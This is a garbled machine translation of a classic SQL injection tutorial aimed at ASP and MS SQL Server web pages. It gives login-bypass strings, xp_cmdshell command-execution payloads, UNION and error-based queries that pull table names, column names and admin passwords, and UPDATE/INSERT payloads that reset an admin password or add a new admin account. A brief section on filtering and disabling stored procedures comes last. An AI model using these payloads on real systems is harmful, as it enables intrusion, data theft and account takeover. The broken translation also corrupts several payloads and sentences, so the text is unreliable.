SQL INJECTION skills drill

xiaoxiao2021-03-06 72

Summary:

The following is to help those who want to master this vulnerability and want to know how to protect themselves from this vulnerability attack.

Written in the nature of the hole.

Details:

1.0 introduction

When a machine is only open for 80 ports (here, it means to provide HTTP service), most of you may not give you a lot of your vulnerabilities.

Valuable information (vulnerability information), if the administrator of this machine is often playing patch for his server, we have to attack the attack.

The spear headeds the web service attack. SQL injection attack is one of the web attack type, this attack has no special requirements, only need

The other party provides normal HTTP services and does not need to pay attention to whether the administrator is a "patch mad". Such an attack is mainly for some kind of web processing

Programs (such as ASP, JSP, PHP, CGI, etc.).

This article is not to introduce any new "玩", and SQL injection attack has been widely circulated. I will write this now.

An article is because I want to record some of my experiences from my recent experiment, I hope to give readers some references. you can also

In "9.0 I can get more related information?" Found more other people, about SQL injection techniques

material.

1.1 What is SQL injection?

This attack is to put SQL's query / behavior commands through 'embedd' in a legal HTTP submission request to attack.

Some intentions of people. Nowadays, many dynamic web pages will get some parameters from the request of the web user, and then dynamically constitute SQL.

Seeking to send the database. For example, when a user needs to log in (user authentication) on the web page, the dynamic web page will

The username submitted by the user is added to the SQL inquiry request to send it to the database to confirm whether the authentication information submitted by the user is.

effective. In the perspective of SQL injection attack, this can make us then modify the user name and / or password value when sending SQL requests

The domain 'area to achieve the purpose of attack.

1.2sql injection requires what (tools, etc.)?

One (some) web browser.

2.0 What information is what you need to find?

First you need to find a page that allows submission of data, such as: Landing page, search page, feedback page, and more. Sometimes, some HTML

The page will pass the required parameters to other ASP pages via the post command. So, sometimes you will not see the relevant in the URL path.

Parameters. Despite this, you can still distinguish whether there is a parameter delivery, related code by viewing the "form" tab in the source code of HTML.

as follows:

Each parameter transfer between the "Form> and " may be utilized (using SQL injection in the case of attack).

2.1 What should you do when you can't find a page with an input behavior?

You can find some pages of related ASP, JSP, CGI, or PHP. Try find some special URLs with certain parameters, such as:

http://duck/index.asp? id = 10

3.0 How should you test these defects?

First add some special character tags, enter as:

Hi 'OR 1 = 1 -

Find some landing page, entered in its login ID and password input, or in the URL:

- login: hi 'or 1 = 1 -

- Pass: hi 'or 1 = 1 -

- http://duck/index.asp? id = hi 'or 1 = 1--

If you want to perform such tests with 'hidden', you can download the HTML page from the website to your local hard drive, modify its hidden part

Value, such as:

If you are lucky, it is estimated that you can now do not need your account and password, 'successful landing'.

3.1 Why is it using 'OR 1 = 1 -?

Let's take a look at the importance of using 'OR 1 = 1 in another example. Nominal login method, use such a landing method

Certain special information that cannot be obtained in the normal landing can be obtained. Use the ASP page you get in a link to computers:

http://duck/index.asp? category = food

In this URL above, 'category' is a variable name, and 'food' is a value given to the variable. In order to do this (link success),

This ASP must contain the following related code (below is also the code we wrote in this experiment):

v_cat = request ("category")

SQLSTR = "SELECT * from Product where pcategory = '" & v_cat ""

SET RS = Conn.execute (SQLSTR)

As we see, the variable value will pre-deal with and assign the value of 'v_cat', that is, the SQL statement will change:

Select * from product where pcategory = 'food'

This request will return the result obtained after the WHERE condition, which is 'Food' in this example. Now imagine if

We change the URL to this way:

http://duck/index.asp? category = food 'or 1 = 1 -

Now our variable V_cat is equivalent to "Food 'or 1 = 1--", now if we want to resize the SQL request,

That SQL request will be:

Select * from product where pcategory = 'food' or 1 = 1-- '

Now this request will pick each message from the Product table and will not pay attention to whether Pcategory is equal to 'FOOD'. End

The two two '-' (dash) is used in 'telling the' MS SQL Server ignores the last '(single quotes). Sometimes

You can use the '#' (well number) instead of '-' (double breaking number) here.

Anyway, if the other party is not a SQL server (here is MS SQL Server), or you can't use a simple method to go to

If the last single quotes are slightly, you can try:

'or' a '=' a

This kind of SQL request will change:

Select * from product where pcategory = 'food' or 'a' = 'a'

It also returns the same result.

According to the actual situation, SQL injection requests can have a variety of dynamic changes:

'OR 1 = 1--

OR 1 = 1--

'or' a '=' a

"or" a "=" a ') or (' a '=' a

4.0 How do I join an instant execution command in the SQL injection request?

Servers that can perform SQL injection are often some machines that are negligible to systematically configure check, then we can try to use SQL life.

Let the execution request. The default MS SQL server is running at the System user level, which is equivalent to the execution and access rights of the system administrator.

limit. We can use MS SQL Server's extended storage process (such as master..xp_cmdshell et al.) To perform some of the remote system.

make:

'; exec master..xp_cmdshell' ping 10.10.1.2 '-

If you fail, you can try it with "(dual quotation marks) instead '(single quotes).

The second colon in the above example represents the end of a SQL request (also on behalf of it, following a new SQL command). To test

Whether the ping command is successful, you can listen to the ICMP request package on 10.10.1.2, and confirm if it comes from that SQL

The server is OK:

#tcpdump ICMP

If you can't get a PING request from that SQL server, you can get the error message in the return value of the SQL request, it is possible

It is because the administrator of the SQL server limits the web user access to these storage procedures.

5.0 How can I get the relevant return information about the SQL request I sent?

We can write the URL using the relevant request for the sp_makewebtask handling process:

'; Exec Master..sp_makewebtask "//10.10.1.3/share/output.html", "SELECT * FROM Information

_SChema.tables "

However, the prerequisites are the "Share" attribute of the target host must be set to "Everyone".

6.0 How can I get some important data from the ODBC error message returned from the database?

We can force MS SQL Server to reveal the information we want from returning by sending a well-constructed SQL request (such as the table

Name, column name, etc.). For example, there is such a URL:

http://duck/index.asp? id = 10

In the above URL we can try to use the Union clause to add other request strings after the integer '10', such as:

http://duck/index.asp? id = 10 Union Select Top 1 Table_name from information_schema.tables -

The system table in the above example information_schema.tables includes information on all tables in this server. As for the Table_name area

Includes the name of each table. We have to choose this because we know that it must exist. In other words, our SQL inquiry

Asking the request is:

SELECT TOP 1 TABLE_NAME from Information_Schema.Tables-

The server will return the first table name of the database after receiving the request data. When we use the UNION clause to add the request string to an integer 10

When MS SQL Server attempts to convert the string as an integer value. Since we can't turn string (nvarchar) to an integer type (INT

When the system will generate an error. The server will display the following error message:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Table1 'to a column of data type int.

/index.asp, line 5

Very good, this error message tells us that all related information that appears (including the table name we want to know). In this example, we know that the first table name is "table1". To get the next table name, we can send such a request:

http://duck/index.asp? id = 10 Union Select Top 1 Table_name from Information_schema.tables White

ERE Table_name Not in ('Table1') -

We can also find related special words via Like:

http://duck/index.asp? id = 10 Union Select Top 1 Table_name from Information_schema.tables White

ERE Table_name Like '% 25Login% 25' -

Output results:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Admin_login 'to a Column of Data Type Int.

/index.asp, line 5

6.1 How to find out the column name in the table?

We can use another important table information_schema.columns to list all the column names of a table:

Http: //duck/index.asp? id = 10 Union Select Top 1 Column_Name from Information_SChema.columns

Where Table_name = 'admin_login' -

The output is displayed:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Login_ID 'to a column of data type int.

/index.asp, line 5

Now I have obtained the name of the first column, we can also get the next column name with Not in ():

Http: //duck/index.asp? id = 10 Union Select Top 1 Column_Name from Information_SChema.columns

WHERE TABLE_NAME = 'admin_login' where colorn_name not in ('login_id') -

Output results:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Login_name 'to a column of data type INT.

/index.asp, line 5

If we continue to repeat this, we will get the remaining column names, such as "Password", "Details". When we use it

After the request, you can get (except the column name other than 'Login_ID', 'login_name', 'password'): http://duck/index.asp? Id = 10 Union Select Top 1 Column_name from Information_Schema .COLUMNS

WHERE TABLE_NAME = 'admin_login' Where colorn_name not in ('login_id', 'login_name ",' password '

Details') -

Get it after output:

Microsoft Ole DB Provider for ODBC Drivers Error '80040e14'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Order by Items Must Appear in SELECT LIS

Then The Statement Contains a Union Operator.

/index.asp, line 5

6.2 How do I find the data we need?

Now we need to identify some more important tables and columns, we can use the same trick to ask the database to get relevant information.

Let us now ask the first username of the "admin_login" table:

http://duck/index.asp? id = 10 Union Select Top 1 login_name from admin_login -

Output:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Neo 'to a column of data type int.

/index.asp, line 5

I know that a administrator account is "neo". Finally, what is the password of this administrator account:

http://duck/index.asp? id = 10 Union Select Top 1 Password from admin_login where login_name = '

NEO '-

Output:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

M4trix 'to a column of data type int.

/index.asp, line 5

Now we can use "NEO" to log in to his password ("m4trix").

6.3 How to get a digital string value?

A limitations of expression herein. To convert numbers (numbers between 0-9) to normal text data, we will not

Get the error message we need. For example, we have to try the password "Trinity" to get the account number, and it corresponds to it.

The password is "31173":

http://duck/index.asp? id = 10 Union Select Top 1 Password from admin_login where login_name = '

Trinity '- so that we probably only get the error prompts such as "Page Not Found". The main problem is that in terms of integers (this example)

10) The password "31173" will be converted to a value after the collection (using the UNION clause). This is this un

The ION word call is 'legal', the SQL server will not return any ODBC error message, so we can't get these

Digital data.

To solve this problem, we can add some alphabets to these data strings to determine that the conversion process is wrong. Let's try

Use the following request to replace the original request:

http://duck/index.asp? id = 10 Union Select Top 1 Convert (int, password% 2b '% 20 morpheus') from

Admin_login where login_name = 'trinity' -

Here we are just joining a ( ) plus sign and other characters we want to join (' ' is equal to 0x2b in ASCII). I

A (% 20) space is added to the actual password data in the actual password data. In this case, even if we get

Digital string '31173', which will also become '31173 Morpheus'.

After executing the CONVERT () function, the system will try to convert the '31173 Morpheus' to an integer type, and the SQL server will definitely return this.

ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

31173 Morpheus' to a column of data type int.

/index.asp, line 5

Now you can know the password of 'Trinity' is '31173'.

7.0 How do I update / insert data in the database?

When successfully collected all the columns in the table, we can update the original data or INSERT (joined) in the table.

The data. For a few more, we have to modify the password "neo":

http://duck/index.asp? id = 10; Update 'admin_login' set 'password' = 'newpas5' where login_na

ME = 'neo' -

Add a new record:

http: //duck/index.asp? id = 10; INSERT INTO 'Admin_login' ('login_id', 'login_name ",' Password

',' Details') Values (666, 'NEO2', 'NewPas5', 'Na') -

Now we can use the account "neo2" and password "newPas5" to log in.

8.0 How to avoid being injected by SQL?

Filter some characters that special like single quotes, double quotes, slashes, backslats, colons, empty characters, etc., filtered objects include:

- User input

- Parameters part of the submitted URL request

- Data from cookie

As for the numeric value, there must be a SQL statement declaration before converting it into an integer type, or determine it as an integer number with isNuMeric. Modify the user run level of "Startup and Run SQL Server" low level.

Deleting a series of stored procedures you don't need, such as:

Master..xp_cmdshell, xp_startmail, XP_sendmail, sp_makewebtask

9.0 Where can I get more related information?

We initially come into contact with the SQL injection attacks in the articles of the Rain Forest Puppy about him invading PacketStorm.

http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

A good article for collecting ODBC error messages:

http://www.blackhat.com/pesentations/w ... Hfield.doc

Good articles about SQL injection in SQL Server:

http://www.owasp.org/asac/input_validation/sql.shtml

The article on Senseport About SQL Injection:

http://www.sensepost.com/misc/sqlinsertion.htm

9cbs

New Post(0)